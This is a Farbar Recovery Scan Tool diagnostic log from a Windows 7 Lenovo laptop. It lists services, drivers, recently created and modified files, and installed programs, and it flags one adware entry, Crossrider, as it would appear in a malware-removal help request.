S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [73728 2004-10-22] (Macrovision Corporation) [File not signed]
S3 Lenovo EasyPlus Hotspot; C:\Program Files (x86)\Common Files\lenovo\easyplussdk\bin\EPHotspot64.exe [559872 2014-08-06] (Lenovo)
R2 LMS; C:\Program Files (x86)\Intel\AMT\LMS.exe [174616 2009-09-14] (Intel Corporation)
S3 MSSQL$MSSMLBIZ; c:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe [29293408 2010-12-10] (Microsoft Corporation)
S3 SUService; C:\Program Files (x86)\Lenovo\System Update\SUService.exe [24560 2014-06-18] ()
R2 ThinkVantage Registry Monitor Service; C:\Program Files (x86)\Common Files\Lenovo\tvt_reg_monitor_svc.exe [1019904 2009-08-28] (Lenovo Group Limited) [File not signed]
S3 TVT Backup Service; C:\Program Files (x86)\Lenovo\Rescue and Recovery\rrservice.exe [1475896 2010-07-06] (Lenovo Group Limited)
R2 UNS; C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe [2058776 2009-08-03] (Intel Corporation)
R2 Viewpoint Manager Service; C:\Program Files (x86)\Viewpoint\Common\ViewpointService.exe [24652 2008-09-08] (Viewpoint Corporation) [File not signed]
R2 vToolbarUpdater18.1.10; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.10\ToolbarUpdater.exe [1849368 2014-10-29] (AVG Secure Search)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [153368 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [262424 2014-10-07] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [190744 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [243480 2014-08-28] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [313624 2014-07-18] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [124184 2014-10-05] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [31512 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [274200 2014-10-10] (AVG Technologies CZ, s.r.o.)
R1 avgtp; C:\Windows\system32\drivers\avgtpx64.sys [50976 2014-10-29] (AVG Technologies)
S3 RFCOMM; C:\Windows\System32\DRIVERS\rfcomm.sys [158720 2009-07-13] (Microsoft Corporation) [File not signed]
S3 RimVSerPort; C:\Windows\System32\DRIVERS\RimSerial_AMD64.sys [44032 2011-07-20] (Research in Motion Ltd)
R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [45296 2014-07-28] (Synaptics Incorporated)
R3 TVTI2C; C:\Windows\System32\DRIVERS\Tvti2c.sys [41536 2009-07-02] (Lenovo (United States) Inc.)
S3 whfltr2k; C:\Windows\System32\DRIVERS\whfltr2k.sys [9600 2007-01-26] ()
S2 regi; \??\C:\Windows\system32\drivers\regi.sys [X]
S3 RimUsb; System32\Drivers\RimUsb_AMD64.sys [X]
S3 vpnva; system32\DRIVERS\vpnva64.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-29 12:50 - 2014-10-29 12:57 - 00036480 _____ () C:\Users\Charles\Desktop\Addition.txt
2014-10-29 12:27 - 2014-10-29 12:59 - 00025020 _____ () C:\Users\Charles\Desktop\FRST.txt
2014-10-29 12:25 - 2014-10-29 12:57 - 00000000 ____D () C:\FRST
2014-10-29 12:21 - 2014-10-29 12:21 - 02113536 _____ (Farbar) C:\Users\Charles\Desktop\FRST64.exe
2014-10-29 11:53 - 2014-10-29 12:18 - 00002653 _____ () C:\Windows\SysWOW64\debug.log
2014-10-29 11:53 - 2014-10-29 11:53 - 00000000 ____D () C:\Users\Charles\AppData\Local\AVG Web TuneUp
2014-10-29 11:53 - 2014-10-29 11:53 - 00000000 ____D () C:\ProgramData\AVG Security Toolbar
2014-10-29 11:52 - 2014-10-29 11:53 - 00000000 ____D () C:\ProgramData\AVG Web TuneUp
2014-10-29 11:52 - 2014-10-29 11:52 - 00000000 ____D () C:\ProgramData\AVG Secure Search
2014-10-29 11:52 - 2014-10-29 11:52 - 00000000 ____D () C:\Program Files (x86)\AVG Web TuneUp
2014-10-29 11:52 - 2014-10-29 11:51 - 00050976 _____ (AVG Technologies) C:\Windows\system32\Drivers\avgtpx64.sys
2014-10-29 11:47 - 2014-10-29 11:47 - 00002442 _____ () C:\Windows\System32\Tasks\1014avUpdateInfo
2014-10-29 11:44 - 2014-10-29 11:44 - 00000000 ____D () C:\Users\Charles\AppData\Roaming\AVG2015
2014-10-29 11:43 - 2014-10-29 11:43 - 00000000 ____D () C:\Users\Charles\AppData\Roaming\TuneUp Software
2014-10-29 11:43 - 2014-10-29 11:43 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2014-10-29 11:41 - 2014-10-29 11:43 - 00000000 ____D () C:\ProgramData\AVG2015
2014-10-29 11:37 - 2014-10-29 11:43 - 00000000 ____D () C:\Users\Charles\AppData\Local\Avg2015
2014-10-29 11:37 - 2014-10-29 11:37 - 00000000 ____D () C:\Users\Charles\AppData\Local\MFAData
2014-10-29 11:12 - 2014-10-29 11:12 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-29 11:12 - 2014-10-29 11:12 - 00001113 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-29 11:12 - 2014-10-29 11:12 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-29 11:12 - 2014-10-29 11:12 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-29 11:12 - 2014-10-29 11:12 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-29 11:12 - 2014-10-01 11:11 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-29 11:12 - 2014-10-01 11:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-29 11:12 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-29 11:10 - 2014-10-29 12:09 - 00001184 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-29 11:10 - 2014-10-29 12:09 - 00001184 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-29 11:10 - 2014-10-29 11:10 - 00000552 _____ () C:\Windows\system32\spsys.log
2014-10-18 12:20 - 2014-10-18 12:20 - 00011046 _____ () C:\Windows\DPINST.LOG
2014-10-18 12:20 - 2014-10-18 12:20 - 00001436 _____ () C:\Windows\Synaptics.log
2014-10-18 12:20 - 2014-10-18 12:20 - 00000000 ____H () C:\Windows\system32\Drivers\Msft_Kernel_Smb_driver_Intel_01009.Wdf
2014-10-18 12:20 - 2014-07-28 12:25 - 00536304 _____ (Synaptics Incorporated) C:\Windows\SysWOW64\SynCOM.dll
2014-10-18 12:20 - 2014-07-28 12:25 - 00461552 _____ (Synaptics Incorporated) C:\Windows\system32\Drivers\SynTP.sys
2014-10-18 12:20 - 2014-07-28 12:25 - 00224496 _____ (Synaptics Incorporated) C:\Windows\system32\SynTPAPI.dll
2014-10-18 12:20 - 2014-07-28 12:25 - 00173808 _____ (Synaptics Incorporated) C:\Windows\system32\SynTPCo14.dll
2014-10-18 12:20 - 2014-07-28 12:25 - 00114416 _____ (Synaptics Incorporated) C:\Windows\SysWOW64\SynTPCOM.dll
2014-10-18 12:20 - 2014-07-28 12:25 - 00045296 _____ (Synaptics Incorporated) C:\Windows\system32\Drivers\Smb_driver_Intel.sys
2014-10-18 12:19 - 2014-10-18 12:19 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lenovo
2014-10-16 22:06 - 2014-10-16 22:05 - 00272808 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe
2014-10-16 22:05 - 2014-10-16 22:05 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaw.exe
2014-10-16 22:05 - 2014-10-16 22:05 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\java.exe
2014-10-16 22:05 - 2014-10-16 22:05 - 00098216 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2014-10-16 16:37 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-16 16:37 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-16 16:37 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-16 16:37 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-16 16:37 - 2014-09-20 00:16 - 19280896 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-16 16:37 - 2014-09-20 00:16 - 15399424 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-16 16:37 - 2014-09-19 22:57 - 14368768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-16 16:37 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-16 16:37 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-10-16 16:37 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-16 16:37 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-16 16:37 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-16 16:37 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-16 16:37 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-16 16:37 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-16 16:37 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-16 16:37 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-16 16:37 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-16 16:37 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-16 16:37 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-16 16:37 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-16 16:37 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-16 16:37 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-16 16:37 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-16 16:37 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-16 16:37 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-16 16:36 - 2014-09-20 00:18 - 00051712 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-16 16:36 - 2014-09-20 00:17 - 02236928 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-16 16:36 - 2014-09-20 00:17 - 01407488 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-16 16:36 - 2014-09-20 00:16 - 03959296 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-16 16:36 - 2014-09-20 00:16 - 02655232 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-16 16:36 - 2014-09-20 00:16 - 00855552 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-10-16 16:36 - 2014-09-20 00:16 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-16 16:36 - 2014-09-20 00:16 - 00526336 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-16 16:36 - 2014-09-20 00:16 - 00255488 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-16 16:36 - 2014-09-20 00:16 - 00197120 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-16 16:36 - 2014-09-20 00:16 - 00136704 _____ (Microsoft Corporation) C:\Windows\system32\iesysprep.dll
2014-10-16 16:36 - 2014-09-20 00:16 - 00097280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-16 16:36 - 2014-09-20 00:16 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-16 16:36 - 2014-09-20 00:16 - 00053760 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-16 16:36 - 2014-09-20 00:16 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-16 16:36 - 2014-09-20 00:15 - 01508864 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-16 16:36 - 2014-09-20 00:15 - 00451584 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-16 16:36 - 2014-09-20 00:15 - 00281600 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-16 16:36 - 2014-09-19 22:57 - 13757952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-16 16:36 - 2014-09-19 22:57 - 02861568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-16 16:36 - 2014-09-19 22:57 - 02055168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-16 16:36 - 2014-09-19 22:57 - 01762816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-16 16:36 - 2014-09-19 22:57 - 01180672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-16 16:36 - 2014-09-19 22:57 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2014-10-16 16:36 - 2014-09-19 22:57 - 00493056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-16 16:36 - 2014-09-19 22:57 - 00391168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-16 16:36 - 2014-09-19 22:57 - 00226816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-16 16:36 - 2014-09-19 22:57 - 00163840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-16 16:36 - 2014-09-19 22:57 - 00109056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesysprep.dll
2014-10-16 16:36 - 2014-09-19 22:57 - 00080384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-16 16:36 - 2014-09-19 22:57 - 00061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-16 16:36 - 2014-09-19 22:57 - 00039936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-16 16:36 - 2014-09-19 22:57 - 00033280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-16 16:36 - 2014-09-19 22:56 - 01440768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-16 16:36 - 2014-09-19 22:56 - 00357888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-16 16:36 - 2014-09-19 22:56 - 00226816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-16 16:36 - 2014-09-19 22:38 - 02706432 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-16 16:36 - 2014-09-19 22:33 - 02706432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-16 16:36 - 2014-09-19 21:43 - 00089600 _____ (Microsoft Corporation) C:\Windows\system32\RegisterIEPKEYs.exe
2014-10-16 16:36 - 2014-09-19 21:35 - 00071680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RegisterIEPKEYs.exe
2014-10-16 16:36 - 2014-09-04 21:11 - 06584320 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-16 16:36 - 2014-09-04 20:52 - 05703168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-16 16:36 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-16 16:36 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-16 16:36 - 2014-08-28 21:07 - 03179520 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2014-10-16 16:35 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-16 16:35 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll
2014-10-10 15:14 - 2014-10-10 15:14 - 00274200 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgtdia.sys
2014-10-07 21:43 - 2014-10-07 21:43 - 00262424 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgidsdrivera.sys
2014-10-05 21:41 - 2014-10-05 21:41 - 00124184 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgmfx64.sys
2014-10-01 22:58 - 2014-09-24 21:08 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2014-10-01 22:58 - 2014-09-24 20:40 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2014-10-01 22:58 - 2014-09-09 17:11 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-10-01 22:58 - 2014-09-09 16:47 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-29 12:47 - 2009-12-02 14:05 - 01766829 _____ () C:\Windows\WindowsUpdate.log
2014-10-29 12:18 - 2010-12-07 20:53 - 00000000 ___RD () C:\Users\Charles\Documents\My Dropbox
2014-10-29 12:17 - 2010-12-07 20:51 - 00000000 ____D () C:\Users\Charles\AppData\Roaming\Dropbox
2014-10-29 12:16 - 2012-07-16 16:05 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-29 12:15 - 2011-06-10 19:05 - 00001024 _____ () C:\Users\Charles\.rnd
2014-10-29 12:14 - 2014-09-16 23:30 - 00004452 _____ () C:\Windows\setupact.log
2014-10-29 12:14 - 2012-12-12 23:35 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-29 12:14 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-29 12:13 - 2012-03-18 19:34 - 00137694 _____ () C:\Windows\PFRO.log
2014-10-29 12:06 - 2012-12-12 23:36 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-29 11:53 - 2013-08-04 23:21 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-10-29 11:46 - 2010-10-25 21:30 - 00000000 ____D () C:\ProgramData\MFAData
2014-10-29 11:40 - 2009-12-04 23:03 - 00000000 ____D () C:\Program Files (x86)\AVG
2014-10-29 11:12 - 2011-01-08 14:34 - 00000000 ____D () C:\Users\Charles\Desktop\MISC
2014-10-29 11:07 - 2010-10-25 22:54 - 00000000 ____D () C:\ProgramData\AVG10
2014-10-29 10:47 - 2010-10-25 22:54 - 00000000 ____D () C:\Windows\system32\Drivers\AVG
2014-10-29 10:46 - 2009-07-14 00:13 - 00006712 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-29 10:23 - 2010-10-06 01:31 - 00000000 ____D () C:\Program Files (x86)\Viewpoint
2014-10-29 10:13 - 2014-08-05 12:04 - 00000000 ____D () C:\THOMPSON v. TRW
2014-10-28 22:40 - 2010-12-17 12:20 - 00007602 _____ () C:\Users\Charles\AppData\Local\Resmon.ResmonCfg
2014-10-28 22:32 - 2011-11-24 17:37 - 00000000 ____D () C:\Program Files (x86)\Diablo II
2014-10-18 12:23 - 2009-12-02 14:00 - 00003020 _____ () C:\Windows\System32\Tasks\PMTask
2014-10-18 12:22 - 2009-07-13 22:20 - 00000000 __RSD () C:\Windows\Media
2014-10-18 12:20 - 2013-05-16 01:35 - 00002982 _____ () C:\Windows\System32\Tasks\Synaptics TouchPad Enhancements
2014-10-18 12:19 - 2014-09-22 22:15 - 00000000 ____D () C:\Windows\System32\Tasks\Lenovo
2014-10-18 12:19 - 2009-12-02 14:16 - 00000000 ____D () C:\Windows\Downloaded Installations
2014-10-18 12:19 - 2009-12-02 13:53 - 00000000 ____D () C:\Program Files (x86)\Lenovo
2014-10-18 08:01 - 2012-12-12 23:36 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-18 08:01 - 2012-12-12 23:36 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-17 18:10 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache
2014-10-17 16:44 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\NDF
2014-10-16 22:09 - 2014-04-22 23:13 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-16 22:07 - 2013-10-30 23:26 - 00000000 ____D () C:\ProgramData\Oracle
2014-10-16 22:05 - 2009-12-02 14:10 - 00000000 ____D () C:\Program Files (x86)\Java
2014-10-16 21:27 - 2009-07-13 23:45 - 00464672 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-16 20:27 - 2009-12-02 14:29 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-16 16:56 - 2013-07-17 22:18 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-16 16:50 - 2009-12-05 00:10 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-15 17:23 - 2010-01-04 13:31 - 00000000 ____D () C:\Users\Charles\AppData\Roaming\.oit
2014-10-02 15:53 - 2009-12-04 22:12 - 00278152 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe

Some content of TEMP:
====================
C:\Users\Charles\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmp2qaslf.dll
C:\Users\Charles\AppData\Local\Temp\jre-7u71-windows-i586-iftw.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-17 18:02

==================== End Of Log ============================

 

 

 

ADDITION LOG

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 29-10-2014 01
Ran by Charles at 2014-10-29 13:01:33
Running from C:\Users\Charles\Desktop
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

 Registry Patch to arrange icons in Device and Printers folder of Windows 7 (HKLM\...\W7DevOR) (Version: 1.00 - )
2007 Microsoft Office system (HKLM-x32\...\PROHYBRIDR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Access Help (HKLM-x32\...\{C6FA39A7-26B1-480A-BC74-6D17531AC222}) (Version: 3.00 - Lenovo)
Adobe Acrobat X Pro - English, Français, Deutsch (HKLM-x32\...\{AC76BA86-1033-F400-7760-000000000005}) (Version: 10.1.12 - Adobe Systems)
Adobe Flash Player 10 Plugin (HKLM-x32\...\{0DFB3DE8-65B9-44FF-AA0A-3BECC5A2BFD1}) (Version: 10.0.32.18 - Adobe Systems, Inc.)
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.02) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.02 - Adobe Systems Incorporated)
Advanced Wheel Mouse 6.0.0.001 (HKLM-x32\...\WheelMouse) (Version:  - )
Apple Application Support (HKLM-x32\...\{AAC5D43E-816D-4C2D-8E51-55FFF35BE301}) (Version: 3.0.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{787136D2-F0F8-4625-AA3F-72D7795AC842}) (Version: 7.1.1.3 - Apple Inc.)
Audio / Video Codec Pack (HKLM-x32\...\{B21C0FF0-AECF-47F7-9036-A1A32B10A168}) (Version: 2.0.015 - )
AVG 2015 (HKLM\...\AVG) (Version: 2015.0.5557 - AVG Technologies)
AVG 2015 (Version: 15.0.4189 - AVG Technologies) Hidden
AVG 2015 (Version: 15.0.5557 - AVG Technologies) Hidden
AVG Web TuneUp (HKLM-x32\...\AVG Web TuneUp) (Version: 4.0.0.17 - AVG Technologies)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Business Contact Manager for Outlook 2007 SP2 (HKLM-x32\...\Business Contact Manager) (Version: 3.0.8619.1 - Microsoft Corporation)
Business Contact Manager for Outlook 2007 SP2 (x32 Version: 3.0.8619.1 - Microsoft Corporation) Hidden
Client Security - Password Manager (HKLM\...\{3FD730D4-755F-439B-8082-B55E00924A44}) (Version: 8.30.0049.00 - Lenovo Group Limited)
Conexant 20561 SmartAudio HD (HKLM\...\CNXT_AUDIO_HDA) (Version: 4.92.12.0 - Conexant)
Create Recovery Media (HKLM-x32\...\{50DC5136-21E8-48BC-97E5-1AD055F6B0B6}) (Version: 1.20.0.00 - Lenovo Group Limited)
Crossrider Web Apps (HKLM-x32\...\Crossrider) (Version:  - ) <==== ATTENTION
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Diablo II (HKLM-x32\...\Diablo II) (Version:  - Blizzard Entertainment)
DirectX 9 Runtime (x32 Version: 1.00.0000 - Sonic Solutions) Hidden
DivX Setup (HKLM-x32\...\DivX Setup) (Version: 2.6.1.100 - DivX, LLC)
Dropbox (HKCU\...\Dropbox) (Version: 2.10.30 - Dropbox, Inc.)
E-Transcript Bundle Viewer (HKLM-x32\...\{72AE5ECD-0CAF-4017-BC86-E2908014C09C}) (Version: 5.0.2.132 - Thomson Reuters)
FileZilla Client 3.7.2 (HKLM-x32\...\FileZilla Client) (Version: 3.7.2 - Tim Kosse)
Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden
Hanword HWP document converter for Microsoft Word (x64) (HKLM\...\{90150000-2009-0409-1000-0000000FF1CE}) (Version: 15.0.4454.1506 - Microsoft Corporation)
HP Officejet Pro 8500 A910 Basic Device Software (HKLM\...\{33A06AC3-F20D-417A-B621-83A73771624E}) (Version: 22.0.334.0 - Hewlett-Packard Co.)
HP Officejet Pro 8500 A910 Help (HKLM-x32\...\{13D324E9-9DB1-478D-944C-28BBE1BB80DC}) (Version: 140.0.2.2 - Hewlett Packard)
